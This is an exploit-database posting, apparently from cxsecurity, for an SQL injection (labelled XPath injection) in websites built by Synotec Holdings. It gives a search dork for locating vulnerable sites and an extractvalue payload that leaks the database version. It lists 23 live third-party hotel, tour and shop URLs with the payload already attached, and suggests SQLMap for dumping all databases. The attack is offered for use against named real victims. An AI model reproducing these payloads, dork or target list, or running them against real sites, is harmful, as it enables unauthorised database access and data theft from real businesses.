WEB SITE BY Synotec Holdings Xpath Injection Vulnerability

2020.09.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WEB SITE BY Synotec Holdings Xpath Injection Vulnerability # Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd." # Date: 2020-09-26 # Exploit Author: Behrouz Mansoori # Vendor Homepage: https://www.synotec.lk # Category: Webapps # Tested on: Windows 10 ======================================= [+]Proof Of Concept: [+]Exploit: ' and extractvalue(rand(),concat(0x7e,version()))--+ *You can use SQLMap or manually using the Xpath Injection technique to retrieve all databases~ [+]Demo 1: https://coralsandshotel.com/view_activities.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 2: https://samara.lk/view-product.php?id=46%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 3: https://www.applevacations.com.co/view-city.php?id=11%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/-- [+]Demo 4: http://www.unawatunadive.com/view-dive-courses.php?id=1%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+ [+]Demo 5: https://www.srilanka-round-tours.com/tour-packages.php?id=6%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 6: https://visionlankatours.com/view-one-day-tour-package.php?id=2%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/-- [+]Demo 7: https://tamarindholiday.com/view-tour-package.php?id=11%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 8: http://agpholdings.lk/product.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 9: http://riverstonehotels.com/view-places.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 10: http://srilankalasatours.com/view-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 11: http://www.thehorizonvilla.com/view-room.php?id=9%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+ [+]Demo 12: http://hiriketiyabeach.lk/room-view.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 13: https://www.srilankaparadisetours.com/view-package.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 14: http://www.shinyweddinghalls.shiny.lk/gallery.php?h=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 15: https://www.mirissawhalewarriors.com/view-service.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 16: http://horizon-villa.com/view-facilities.php?id=39%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/-- [+]Demo 17: http://www.newberlintours.lk/view-excursions.php?id=6%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 18: http://gimlk.com/products.php?id=14%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 19: https://susanthadriversrilanka.com/view-day-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 20: http://www.srilankasmarttours.com/booking-form.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 21: http://srilankantimetraveller.com/view-package.php?id=32%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ [+]Demo 22: http://okithmatours.com/view-attractions.php?id=5%20and%20extractvalue(rand(),concat(0x7e,version()))-- [+]Demo 23: http://www.touroflanka.com/view-tour.php?id=4%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ ######################################################### #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com #########################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top